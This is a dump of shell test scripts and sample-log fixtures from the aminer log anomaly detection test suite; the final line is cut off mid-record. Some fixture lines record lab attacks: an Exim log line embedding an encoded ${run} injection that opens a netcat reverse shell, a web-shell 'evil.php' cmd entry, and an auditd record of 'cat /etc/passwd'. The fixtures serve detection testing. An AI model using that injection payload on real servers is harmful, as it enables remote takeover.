logdata-anomaly-miner-2.6.1/aecid-testsuite/integration/offline_mode/000077500000000000000000000000001437606560100257565ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/aecid-testsuite/integration/offline_mode/data/000077500000000000000000000000001437606560100266675ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/aecid-testsuite/integration/offline_mode/data/file1.log000066400000000000000000000000141437606560100303650ustar00rootroot00000000000000a1 b1 c1 z1 logdata-anomaly-miner-2.6.1/aecid-testsuite/integration/offline_mode/data/file2.log000066400000000000000000000000141437606560100303660ustar00rootroot00000000000000a2 b2 c2 z2 logdata-anomaly-miner-2.6.1/aecid-testsuite/integration/offline_mode/offline_mode.yml000066400000000000000000000010021437606560100311200ustar00rootroot00000000000000LearnMode: False Core.LogDir: '/tmp/lib/aminer/log' Core.PersistenceDir: '/tmp/lib/aminer' LogResourceList: - 'file:///tmp/file1.log' - 'file:///tmp/file2.log' Parser: - id: data type: AnyByteDataModelElement name: 'data' - id: model start: True type: FirstMatchModelElement name: 'model' args: - data Input: timestamp_paths: None EventHandlers: - id: stpe type: StreamPrinterEventHandler logdata-anomaly-miner-2.6.1/aecid-testsuite/runAminerDemo.sh000077500000000000000000000013221437606560100241070ustar00rootroot00000000000000ERR=/tmp/err.txt if [[ $1 == *.py ]]; then cp $1 /tmp/demo-config.py sudo chown aminer:aminer /tmp/demo-config.py 2> /dev/null elif [[ $1 == *.yml ]]; then cp $1 /tmp/demo-config.yml sudo chown aminer:aminer /tmp/demo-config.yml 2> /dev/null else exit 2 fi sudo chown -R aminer:aminer /tmp/lib 2> /dev/null sudo chmod +x demo/aminer/aminerDemo.sh sudo ./demo/aminer/aminerDemo.sh > /dev/null 2> $ERR exit_code=$? if `grep -Fq "Traceback" $ERR` || `grep -Fq "{'Parser'" $ERR` || `grep -Fq "FATAL" $ERR` || `grep -Fq "Config-Error" $ERR`; then exit_code=1 fi cat $ERR sudo rm /tmp/demo-config.py 2> /dev/null sudo rm /tmp/demo-config.yml 2> /dev/null sudo rm /tmp/syslog sudo rm $ERR exit $exit_code logdata-anomaly-miner-2.6.1/aecid-testsuite/runAminerEncodingDemo.sh000077500000000000000000000013751437606560100255660ustar00rootroot00000000000000ERR=/tmp/err.txt if [[ $1 == *.py ]]; then cp $1 /tmp/demo-config.py echo "config_properties['Log.Encoding'] = 'latin-1'" >> /tmp/demo-config.py sudo chown aminer:aminer /tmp/demo-config.py 2> /dev/null elif [[ $1 == *.yml ]]; then cp $1 /tmp/demo-config.yml echo "Log.Encoding: 'latin-1'" >> /tmp/demo-config.yml sudo chown aminer:aminer /tmp/demo-config.yml 2> /dev/null else exit 2 fi sudo chown -R aminer:aminer /tmp/lib 2> /dev/null sudo chmod +x demo/aminer/aminerDemo.sh sudo ./demo/aminer/aminerDemo.sh > /dev/null 2> $ERR exit_code=$? OUTPUT=$(cat $ERR) if grep -Fq "Traceback" $ERR; then exit_code=1 fi cat $ERR sudo rm /tmp/demo-config.py 2> /dev/null sudo rm /tmp/demo-config.yml 2> /dev/null sudo rm $ERR exit $exit_code logdata-anomaly-miner-2.6.1/aecid-testsuite/runAminerIntegrationTest.sh000077500000000000000000000010371437606560100263510ustar00rootroot00000000000000echo localhost | sudo tee /etc/hostname > /dev/null cd integration script=$1 sudo chmod +x $script cntr=0 for var in "$@" do if [[ $cntr -gt 0 ]]; then cp "$var" /tmp/"$var" fi cntr=$(($cntr+1)) done sudo ./$script exit_code=$? cntr=0 for var in "$@" do if [[ $cntr -gt 0 ]]; then sudo rm /tmp/"$var" fi cntr=$(($cntr+1)) done test -e /var/mail/mail && sudo rm -f /var/mail/mail cd .. sudo rm /tmp/syslog sudo rm /tmp/output test -e /tmp/out && sudo rm /tmp/out test -e /tmp/auth.log && sudo rm /tmp/auth.log exit $exit_code logdata-anomaly-miner-2.6.1/aecid-testsuite/runAminerJsonInputDemo.sh000077500000000000000000000052451437606560100257710ustar00rootroot00000000000000cp demo/aminerJsonInputDemo/json-input-demo-config.yml /tmp/json-input-demo-config.yml sudo chown -R aminer:aminer /tmp/lib 2> /dev/null sudo chmod +x demo/aminerJsonInputDemo/aminerJsonInputDemo.sh sudo ./demo/aminerJsonInputDemo/aminerJsonInputDemo.sh > /tmp/out.txt exit_code=$? OUTPUT=$(cat /tmp/out.txt) read -r -d '' VAR << END New path(es) detected NewMatchPathDetector: "DefaultNewMatchPathDetector" (1 lines) /model: {'menu': {'id': 'file', 'value': 'File', 'popup': {'menuitem': [{'value': 'New', 'onclick': 'CreateNewDoc()'}, {'value': 'Open', 'onclick': 'OpenDoc()'}, {'value': 'Close', 'onclick': 'CloseDoc()'}]}}} /model/menu/id: file /model/menu/value: File /model/menu/popup/menuitem/buttonNames: 0 /model/menu/popup/menuitem/buttonOnclick: 0 /model/menu/popup/menuitem/buttonNames: 1 /model/menu/popup/menuitem/buttonOnclick: 1 /model/menu/popup/menuitem/buttonNames: 2 /model/menu/popup/menuitem/buttonOnclick: 2 ['/model', '/model/menu/popup/menuitem/buttonNames', '/model/menu/popup/menuitem/buttonOnclick', '/model/menu/id', '/model/menu/value', '/model/menu/popup/menuitem/buttonNames/0', '/model/menu/popup/menuitem/buttonOnclick/0', '/model/menu/popup/menuitem/buttonNames/1', '/model/menu/popup/menuitem/buttonOnclick/1', '/model/menu/popup/menuitem/buttonNames/2', '/model/menu/popup/menuitem/buttonOnclick/2'] Original log line: {"menu": { "id": "file", "value": "File", "popup": { "menuitem": [ {"value": "New", "onclick": "CreateNewDoc()"}, {"value": "Open", "onclick": "OpenDoc()"}, {"value": "Close", "onclick": "CloseDoc()"} ] } }} END if [[ "$OUTPUT" != *"$VAR"* ]]; then echo "$VAR" echo exit_code=1 fi read -r -d '' VAR << END New value combination(s) detected NewMatchPathValueComboDetector: "NewMatchPathValueCombo" (1 lines) (b'file', b'File') Original log line: {"menu": { "id": "file", "value": "File", "popup": { "menuitem": [ {"value": "New", "onclick": "CreateNewDoc()"}, {"value": "Open", "onclick": "OpenDoc()"}, {"value": "Close", "onclick": "CloseDoc()"} ] } }} END if [[ "$OUTPUT" != *"$VAR"* ]]; then echo "$VAR" echo exit_code=1 fi read -r -d '' VAR << END New value(s) detected NewMatchPathValueDetector: "NewMatchPathValue" (1 lines) {'/model/menu/id': 'file'} END if [[ "$OUTPUT" != *"$VAR"* ]]; then echo "$VAR" echo exit_code=1 fi read -r -d '' VAR << END New value(s) detected NewMatchPathValueDetector: "NewMatchPathValue" (1 lines) {'/model/menu/value': 'File'} END if [[ "$OUTPUT" != *"$VAR"* ]]; then echo "$VAR" echo exit_code=1 fi sudo rm /tmp/json-input-demo-config.yml 2> /dev/null sudo rm /tmp/syslog sudo rm /tmp/out.txt exit $exit_code logdata-anomaly-miner-2.6.1/aecid-testsuite/runConfAvailableTest.sh000077500000000000000000002164221437606560100254260ustar00rootroot00000000000000#!/bin/bash . ./testFunctions.sh sudo mkdir /tmp/lib 2> /dev/null sudo mkdir /tmp/lib/aminer 2> /dev/null sudo chown -R $USER:$USER /tmp/lib/aminer 2> /dev/null sudo rm -r /tmp/lib/aminer/* 2> /dev/null sudo mkdir /tmp/lib/aminer/log 2> /dev/null sudo chown -R aminer:aminer /tmp/lib/aminer 2> /dev/null sudo rm /tmp/syslog 2> /dev/null exit_code=0 CONFIG_PATH=/tmp/config.yml OUT=/tmp/output.txt LOGFILE=/tmp/log.txt #PATH_AIT_LDS=../source/root/etc/aminer/conf-available/ait-lds/*.py PATH_AIT_LDS=/etc/aminer/conf-available/ait-lds/*.py #PATH_AIT_LDS2=../source/root/etc/aminer/conf-available/ait-lds2/*.py PATH_AIT_LDS2=/etc/aminer/conf-available/ait-lds2/*.py #PATH_GENERIC=../source/root/etc/aminer/conf-available/generic/*.py PATH_GENERIC=/etc/aminer/conf-available/generic/*.py cntr=0 files=() for filename in $PATH_AIT_LDS; do files[$cntr]=$filename let cntr=cntr+1 done for filename in $PATH_AIT_LDS2; do files[$cntr]=$filename let cntr=cntr+1 done for filename in $PATH_GENERIC; do files[$cntr]=$filename let cntr=cntr+1 done for filename in ${files[@]}; do cat > $CONFIG_PATH < $LOGFILE echo '::1 - - [17/May/2015:10:05:03 +0000] "-" 200 203023' >> $LOGFILE echo '192.168.10.190 - - [29/Feb/2020:13:58:32 +0000] "GET /services/portal/ HTTP/1.1" 200 7499 "-" "-"' >> $LOGFILE ;; ApacheErrorParsingModel) echo '[Sun Mar 01 06:28:15.983231 2020] [:error] [pid 32548] [client 192.168.10.4:55308] PHP Warning: Declaration of Horde_Form_Type_pgp::init($gpg, $temp_dir = NULL, $rows = NULL, $cols = NULL) should be compatible with Horde_Form_Type_longtext::init($rows = 8, $cols = 80, $helper = Array) in /usr/share/php/Horde/Form/Type.php on line 878, referer: http://mail.cup.com/nag/' > $LOGFILE echo "[Sun Mar 01 06:28:15.983231 2020] [:error] [pid 32548] [client 192.168.10.4:55308] PHP Warning: system(): Cannot execute a blank command in words.php on line 12" > $LOGFILE echo "[Wed Mar 04 19:32:45.144442 2020] [:error] [pid 8738] [client 192.168.10.238:60488] PHP Notice: Undefined index: cmd in /var/www/mail.cup.com/static/evil.php on line 1" >> $LOGFILE echo "[Wed Mar 04 06:26:43.756548 2020] [:error] [pid 22069] [client 192.168.10.190:33604] PHP Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; Horde_Form_Variable has a deprecated constructor in /usr/share/php/Horde/Form/Variable.php on line 24, referer: http://mail.cup.com/nag/" >> $LOGFILE ;; AuditdParsingModel) echo 'type=EXECVE msg=audit(1582934957.620:917519): argc=10 a0="find" a1="/usr/lib/php" a2="-mindepth" a3="1" a4="-maxdepth" a5="1" a6="-regex" a7=".*[0-9]\.[0-9]" a8="-printf" a9="%f\n"' > $LOGFILE echo 'type=PROCTITLE msg=audit(1582934957.616:917512): proctitle=736F7274002D726E' >> $LOGFILE echo 'type=SYSCALL msg=audit(1582934957.616:917513): arch=c000003e syscall=2 success=yes exit=3 a0=7f5b904e4988 a1=80000 a2=1 a3=7f5b906ec518 items=1 ppid=25680 pid=25684 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sort" exe="/usr/bin/sort" key=(null)' >> $LOGFILE echo 'type=PATH msg=audit(1582934957.616:917512): item=0 name="/usr/bin/sort" inode=2883 dev=fe:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL' >> $LOGFILE echo 'type=LOGIN msg=audit(1582935421.373:947570): pid=25821 uid=0 old-auid=4294967295 auid=0 tty=(none) old-ses=4294967295 ses=22 res=1' >> $LOGFILE echo "type=SOCKADDR msg=audit(1582935421.377:947594): saddr=01002F6465762F6C6F6700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" >> $LOGFILE echo "type=UNKNOWN[1327] msg=audit(1522927552.749:917): proctitle=636174002F6574632F706173737764" >> $LOGFILE echo 'type=CRED_REFR msg=audit(1583242318.512:13886958): pid=17474 uid=33 auid=4294967295 ses=4294967295 msg=message comm="apache2" terminal="/usr/bin/bash" res=(null)' >> $LOGFILE echo 'type=USER_START msg=audit(1583242318.512:13886958): pid=17474 uid=33 auid=4294967295 ses=4294967295 msg=message comm="apache2" terminal="/usr/bin/bash" res=(null)' >> $LOGFILE echo 'type=USER_ACCT msg=audit(1583242318.512:13886958): pid=17474 uid=33 auid=4294967295 ses=4294967295 msg=message comm="apache2" terminal="/usr/bin/bash" res=(null)' >> $LOGFILE echo 'type=USER_AUTH msg=audit(1583242318.512:13886958): pid=17474 uid=33 auid=4294967295 ses=4294967295 msg=message comm="apache2" terminal="/usr/bin/bash" res=(null)' >> $LOGFILE echo 'type=CRED_DISP msg=audit(1583242318.512:13886958): pid=17474 uid=33 auid=4294967295 ses=4294967295 msg=message comm="apache2" terminal="/usr/bin/bash" res=(null)' >> $LOGFILE echo 'type=SERVICE_START msg=audit(1583242318.512:13886958): pid=17474 uid=33 auid=4294967295 ses=4294967295 msg=message comm="apache2" terminal="/usr/bin/bash" res=(null)' >> $LOGFILE echo 'type=SERVICE_STOP msg=audit(1583242318.512:13886958): pid=17474 uid=33 auid=4294967295 ses=4294967295 msg=message comm="apache2" terminal="/usr/bin/bash" res=(null)' >> $LOGFILE echo 'type=USER_END msg=audit(1583242318.512:13886958): pid=17474 uid=33 auid=4294967295 ses=4294967295 msg=message comm="apache2" terminal="/usr/bin/bash" res=(null)' >> $LOGFILE echo 'type=USER_CMD msg=audit(1583242318.512:13886958): pid=17474 uid=33 auid=4294967295 ses=4294967295 msg=message comm="apache2" terminal="/usr/bin/bash" res=(null)' >> $LOGFILE echo 'type=CRED_ACQ msg=audit(1583242318.512:13886958): pid=17474 uid=33 auid=4294967295 ses=4294967295 msg=message comm="apache2" terminal="/usr/bin/bash" res=(null)' >> $LOGFILE echo 'type=BPRM_FCAPS msg=audit(1583242318.512:13886958): fver=17474 fp=33 fi=4294967295 fe=4294967295 old_pp=message old_pi="apache2" old_pe="/usr/bin/bash" new_pp=(null) new_pi=(null) new_pe=(null)' >> $LOGFILE ;; EximParsingModel) echo "2020-02-29 00:04:25 Start queue run: pid=31912" > $LOGFILE echo "2020-02-29 00:34:25 End queue run: pid=32425" >> $LOGFILE echo "2020-03-04 19:17:34 no host name found for IP address 192.168.10.238" >> $LOGFILE echo "2020-03-04 19:21:48 VRFY failed for boyce@cup.com H=(x) [192.168.10.238]" >> $LOGFILE echo "2020-03-04 19:25:08 1j9Zdk-00029d-Bi <= trula@mail.cup.com U=www-data P=local S=8714 id=20200304192508.Horde.g3OQpszuommgdrQpHrx6wIc@mail.cup.com" >> $LOGFILE echo "2020-03-04 19:25:08 1j9Zdk-00029d-Bi => irwin R=local_user T=mail_spool" >> $LOGFILE echo '2020-03-04 19:36:19 1j9ZoZ-0002Jk-9W ** ${run{\x2fbin\x2fsh\t-c\t\x22nc\t-e\t\x2fbin\x2fsh\t192.168.10.238\t9963\x22}}@localhost: Too many "Received" headers - suspected mail loop' >> $LOGFILE echo "2020-03-04 19:36:57 1j9ZpB-0002KN-QF Completed" >> $LOGFILE echo "2020-03-04 20:04:25 1j9ZoZ-0002Jk-9W Message is frozen" >> $LOGFILE echo "2020-03-04 19:38:19 1j9ZoZ-0002Jk-9W Frozen (delivery error message)" >> $LOGFILE ;; SuricataEventParsingModel) echo '{"timestamp":"2020-02-29T00:00:12.734324+0000","flow_id":914989792375924,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.154","src_port":53985,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":30266,"rrname":"190.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}}' > $LOGFILE echo '{"timestamp":"2020-02-29T00:00:14.000538+0000","flow_id":1357371404246463,"event_type":"flow","src_ip":"192.168.10.154","src_port":46289,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:55:12.974271+0000","end":"2020-02-28T23:55:13.085657+0000","age":1,"state":"established","reason":"timeout","alerted":false}}' >> $LOGFILE echo '{"timestamp":"2020-02-29T00:00:14.886252+0000","flow_id":149665274984610,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.190","src_port":39438,"dest_ip":"192.168.10.154","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.cup.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.cup.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7326}}' >> $LOGFILE echo '{"timestamp":"2020-02-29T00:00:14.977952+0000","flow_id":149665274984610,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.154","src_port":80,"dest_ip":"192.168.10.190","dest_port":39438,"proto":"TCP","http":{"hostname":"mail.cup.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.cup.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7326},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":41080,"tx_id":1}}' >> $LOGFILE echo '{"timestamp":"2020-02-29T00:00:18.000491+0000","event_type":"stats","stats":{"uptime":17705,"capture":{"kernel_packets":337720,"kernel_drops":0},"decoder":{"pkts":337749,"bytes":229373623,"invalid":3062,"ipv4":335528,"ipv6":10,"ethernet":337749,"raw":0,"null":0,"sll":0,"tcp":317611,"udp":14805,"sctp":0,"icmpv4":50,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":679,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7104256},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":7155,"ssn_memcap_drop":0,"pseudo":1082,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":7418,"synack":7307,"rst":3226,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":375,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":58},"app_layer":{"flow":{"http":4883,"ftp":0,"smtp":0,"tls":1564,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":258,"dcerpc_udp":0,"dns_udp":6951,"failed_udp":119},"tx":{"http":13248,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":7185}},"flow_mgr":{"closed_pruned":7112,"new_pruned":21,"est_pruned":6999,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":0,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":24462,"memcap_state":0,"memcap_global":0},"http":{"memuse":61601,"memcap":0}}}' >> $LOGFILE echo '{"timestamp":"2020-02-29T00:01:53.976648+0000","flow_id":378741657290945,"in_iface":"eth0","event_type":"tls","src_ip":"192.168.10.238","src_port":53156,"dest_ip":"192.168.10.154","dest_port":443,"proto":"TCP","tls":{"subject":"CN=mail.cup.com","issuerdn":"CN=ChangeMe","fingerprint":"12:7a:88:ea:52:10:62:44:f0:c5:33:8a:28:2d:ad:12:a1:4e:7e:18","sni":"mail.cup.com","version":"TLS 1.2","notbefore":"2020-02-28T18:40:23","notafter":"2030-02-25T18:40:23"}}' >> $LOGFILE echo '{"timestamp":"2020-02-29T06:11:02.147044+0000","flow_id":415686269975930,"in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":50850,"dest_ip":"192.168.10.154","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2012887,"rev":3,"signature":"ET POLICY Http Client Body contains pass= in cleartext","category":"Potential Corporate Privacy Violation","severity":1},"http":{"hostname":"mail.cup.com","url":"\/login.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.cup.com\/login.php","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"\/services\/portal\/","length":20}}' >> $LOGFILE ;; SuricataFastParsingModel) echo "02/29/2020-00:00:13.674931 [**] [1:2012887:3] ET POLICY Http Client Body contains pass= in cleartext [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 192.168.10.190:39438 -> 192.168.10.154:80" > $LOGFILE ;; SyslogParsingModel) echo "Feb 29 00:01:41 mail-0 dovecot: imap(kelsey): Logged out in=79 out=875" > $LOGFILE echo "Mar 1 06:25:38 mail dovecot: imap(lino): Error: Failed to autocreate mailbox INBOX: Internal error occurred. Refer to server log for more information. [2020-03-01 06:25:38]" >> $LOGFILE echo "Feb 29 00:01:44 mail-0 dovecot: imap(della): Error: file_dotlock_create(/var/mail/della) failed: Permission denied (euid=1013(della) egid=1013(della) missing +w perm: /var/mail, we're not in group 8(mail), dir owned by 0:8 mode=0775) (set mail_privileged_group=mail)" >> $LOGFILE echo "Mar 1 06:25:41 mail dovecot: imap(idella): Error: Failed to autocreate mailbox INBOX: Internal error occurred. Refer to server log for more information. [2020-03-01 06:25:41]" >> $LOGFILE echo "Mar 4 14:14:36 mail dovecot: imap-login: Disconnected (auth failed, 2 attempts in 12 secs): user=, method=PLAIN, rip=127.0.0.1, lip=127.0.0.1, secured, session=" >> $LOGFILE echo "Mar 4 18:43:05 mail dovecot: imap-login: Disconnected (no auth attempts in 0 secs): user=<>, rip=192.168.10.185, lip=192.168.10.177, session=" >> $LOGFILE echo "Mar 4 13:51:48 mail dovecot: imap-login: Disconnected (disconnected before auth was ready, waited 0 secs): user=<>, rip=192.168.10.18, lip=192.168.10.21, session=<+KO9uAeg4sPAqAoS>" >> $LOGFILE echo "Mar 4 18:43:59 mail dovecot: imap-login: Login: user=, method=PLAIN, rip=127.0.0.1, lip=127.0.0.1, mpid=11475, secured, session=<8ZitzQugnrh/AAAB>" >> $LOGFILE echo "Feb 29 11:39:45 mail-0 dovecot: imap-login: Error: anvil: Anvil queries timed out after 5 secs - aborting queries" >> $LOGFILE echo "Feb 29 09:15:59 mail-1 dovecot: imap-login: Warning: Auth process not responding, delayed sending initial response (greeting): user=<>, rip=127.0.0.1, lip=127.0.0.1, secured, session=" >> $LOGFILE echo "Feb 29 11:39:35 mail-2 dovecot: auth: Error: auth worker: Aborted PASSV request for marjory: Worker process died unexpectedly" >> $LOGFILE echo "Feb 29 11:39:35 mail-2 dovecot: auth-worker(2233): Fatal: Error reading configuration: Timeout reading config from /var/run/dovecot/config" >> $LOGFILE echo "Feb 29 11:39:35 mail-2 dovecot: master: Error: service(auth-worker): command startup failed, throttling for 2 secs" >> $LOGFILE echo 'Feb 29 11:39:46 mail-2 HORDE: [imp] Login success for marjory (192.168.10.18) to {imap://localhost/} [pid 1764 on line 156 of "/var/www/mail.insect.com/imp/lib/Auth.php"]' >> $LOGFILE echo 'Feb 29 17:18:23 mail-2 HORDE: [imp] Message sent to marcelle@mail.insect.com, merlene@mail.insect.com from les (192.168.10.18) [pid 9596 on line 970 of "/var/www/mail.insect.com/imp/lib/Compose.php"]' >> $LOGFILE echo 'Feb 29 20:01:48 mail-2 HORDE: [imp] FAILED LOGIN for violet (192.168.10.18) to {imap://localhost/} [pid 14794 on line 156 of "/var/www/mail.insect.com/imp/lib/Auth.php"]' >> $LOGFILE echo 'Mar 1 06:25:38 mail HORDE: [imp] [status] Could not open mailbox "INBOX". [pid 999 on line 730 of "/var/www/mail.onion.com/imp/lib/Imap.php"]' >> $LOGFILE echo 'Mar 1 06:27:56 mail HORDE: [imp] [getSyncToken] IMAP error reported by server. [pid 1127 on line 730 of "/var/www/mail.onion.com/imp/lib/Imap.php"]' >> $LOGFILE echo 'Feb 29 12:12:54 mail-2 HORDE: [horde] Login success for dorie to horde (192.168.10.18) [pid 2272 on line 163 of "/var/www/mail.insect.com/login.php"]' >> $LOGFILE echo 'Feb 29 12:13:00 mail-2 HORDE: [horde] User marjory logged out of Horde (192.168.10.18) [pid 2988 on line 106 of "/var/www/mail.insect.com/login.php"]' >> $LOGFILE echo 'Feb 29 17:07:07 mail-2 HORDE: [horde] FAILED LOGIN for marcelle to horde (192.168.10.98) [pid 8517 on line 198 of "/var/www/mail.insect.com/login.php"]' >> $LOGFILE echo 'Mar 1 18:22:40 mail HORDE: [imp] [login] Authentication failed. [pid 12890 on line 730 of "/var/www/mail.onion.com/imp/lib/Imap.php"]' >> $LOGFILE echo 'Mar 4 18:55:05 mail HORDE: [turba] PHP ERROR: finfo_file(): Empty filename or path [pid 11642 on line 166 of "/usr/share/php/Horde/Mime/Magic.php"]' >> $LOGFILE echo 'Mar 4 18:50:51 mail HORDE: [horde] PHP ERROR: Cannot modify header information - headers already sent [pid 11019 on line 0 of "Unknown"]' >> $LOGFILE echo 'Mar 4 18:01:23 mail HORDE: Guest user is not authorized for Horde (Host: 192.168.10.81). [pid 4815 on line 324 of "/usr/share/php/Horde/Registry.php"]' >> $LOGFILE echo 'Mar 4 18:10:08 mail HORDE: PHP ERROR: rawurlencode() expects parameter 1 to be string, array given [pid 6556 on line 302 of "/usr/share/php/Horde/Url.php"]' >> $LOGFILE # missing model/service/horde/horde/free_msg - no log found! echo "Feb 29 12:39:02 mail-0 CRON[11260]: (root) CMD ( [ -x /usr/lib/php/sessionclean ] && if [ ! -d /run/systemd/system ]; then /usr/lib/php/sessionclean; fi)" >> $LOGFILE echo "Feb 29 06:25:01 mail-1 CRON[27486]: pam_unix(cron:session): session opened for user root by (uid=0)" >> $LOGFILE echo "Feb 29 15:42:36 mail-1 auth: pam_unix(dovecot:auth): authentication failure; logname= uid=0 euid=0 tty=dovecot ruser=marcelino rhost=127.0.0.1 user=marcelino" >> $LOGFILE echo "Mar 1 03:09:18 mail-0 systemd[1]: Starting Clean php session files..." >> $LOGFILE echo "Mar 1 03:09:19 mail-0 systemd[1]: Started Clean php session files." >> $LOGFILE echo "Mar 1 18:26:18 mail systemd[1]: Starting Cleanup of Temporary Directories..." >> $LOGFILE echo "Mar 1 18:26:18 mail systemd[1]: Started Cleanup of Temporary Directories." >> $LOGFILE echo "Mar 2 06:37:52 mail systemd[1]: Starting Daily apt upgrade and clean activities..." >> $LOGFILE echo "Mar 2 06:37:53 mail systemd[1]: Started Daily apt upgrade and clean activities." >> $LOGFILE echo "Mar 2 12:30:18 mail systemd[1]: Starting Daily apt download activities..." >> $LOGFILE echo "Mar 2 12:30:19 mail systemd[1]: Started Daily apt download activities." >> $LOGFILE echo "Mar 3 06:29:00 mail systemd[1]: Starting Security Auditing Service..." >> $LOGFILE echo "Mar 3 06:29:00 mail systemd[1]: Started Security Auditing Service." >> $LOGFILE echo "Mar 4 06:29:05 mail systemd[1]: Stopping Security Auditing Service..." >> $LOGFILE echo "Mar 4 06:29:05 mail systemd[1]: Stopped Security Auditing Service." >> $LOGFILE echo "Mar 5 06:25:35 mail systemd[1]: Reloading The Apache HTTP Server." >> $LOGFILE echo "Mar 5 06:25:35 mail systemd[1]: Reloaded The Apache HTTP Server." >> $LOGFILE echo "Feb 29 11:52:32 mail-2 systemd[1]: Mounting Arbitrary Executable File Formats File System..." >> $LOGFILE echo "Feb 29 11:52:32 mail-2 systemd[1]: Mounted Arbitrary Executable File Formats File System." >> $LOGFILE echo "Feb 29 13:56:59 mail-2 systemd[1]: apt-daily.timer: Adding 6h 4min 46.743459s random time." >> $LOGFILE # missing model/service/systemd/service - no log found! echo "Feb 29 07:24:02 mail-0 kernel: [47678.309129] [] ? ret_from_fork+0x57/0x70" >> $LOGFILE echo "Mar 5 06:29:07 mail augenrules[17378]: backlog_wait_time 0" >> $LOGFILE echo "Mar 5 06:29:07 mail auditd[17377]: dispatch error reporting limit reached - ending report notification." >> $LOGFILE echo "Mar 5 06:29:07 mail auditd: audit log is not writable by owner" >> $LOGFILE echo "Mar 4 06:29:05 mail audispd: No plugins found, exiting" >> $LOGFILE echo 'Mar 3 06:29:01 mail liblogging-stdlog: [origin software="rsyslogd" swVersion="8.24.0" x-pid="480" x-info="http://www.rsyslog.com"] rsyslogd was HUPed' >> $LOGFILE echo "Mar 1 09:25:16 mail freshclam[22090]: Sun Mar 1 09:25:16 2020 -> bytecode.cvd is up to date (version: 331, sigs: 94, f-level: 63, builder: anvilleg)" >> $LOGFILE echo "Mar 1 07:26:09 mail dhclient[418]: DHCPREQUEST of 192.168.10.21 on eth0 to 192.168.10.2 port 67" >> $LOGFILE echo "Mar 1 00:59:38 mail-2 dhclient[387]: DHCPACK of 192.168.10.21 from 192.168.10.2" >> $LOGFILE echo "Feb 29 21:12:42 mail-2 dhclient[418]: bound to 192.168.10.21 -- renewal in 36807 seconds." >> $LOGFILE ;; AminerParsingModel) sudo cp ./demo/aminer/jsonConverterHandler-demo-config.py /tmp/demo-config.py sudo ./demo/aminer/aminerDemo.sh > $LOGFILE sed -i -e 1,2d $LOGFILE sed -i -e "/Generating data for the LinearNumericBinDefinition histogram report../d" $LOGFILE sed -i -e "/Generating data for the ModuloTimeBinDefinition histogram report../d" $LOGFILE sed -i "/^CPU Temp: /d" $LOGFILE sed -i "/^first$/d" $LOGFILE sed -i "/^second$/d" $LOGFILE sed -i "/^third$/d" $LOGFILE sed -i "/^fourth$/d" $LOGFILE cat >> $CONFIG_PATH < $LOGFILE echo '127.0.0.1 - - [01/May/2020:21:44:53 +0200] "GET /phpmyadmin/sql.php?server=1&db=seconlineportaldb&table=CONTRACT&pos=0 HTTP/1.1" 200 5326 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:75.0) Gecko/20100101 Firefox/75.0"' >> $LOGFILE echo '127.0.0.1 - - [01/Apr/2020:09:19:23 +0200] "GET /phpmyadmin/themes/pmahomme/img/b_drop.png HTTP/1.1" 304 180 "http://localhost/phpmyadmin/phpmyadmin.css.php?nocache=6340393753ltr&server=1" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; 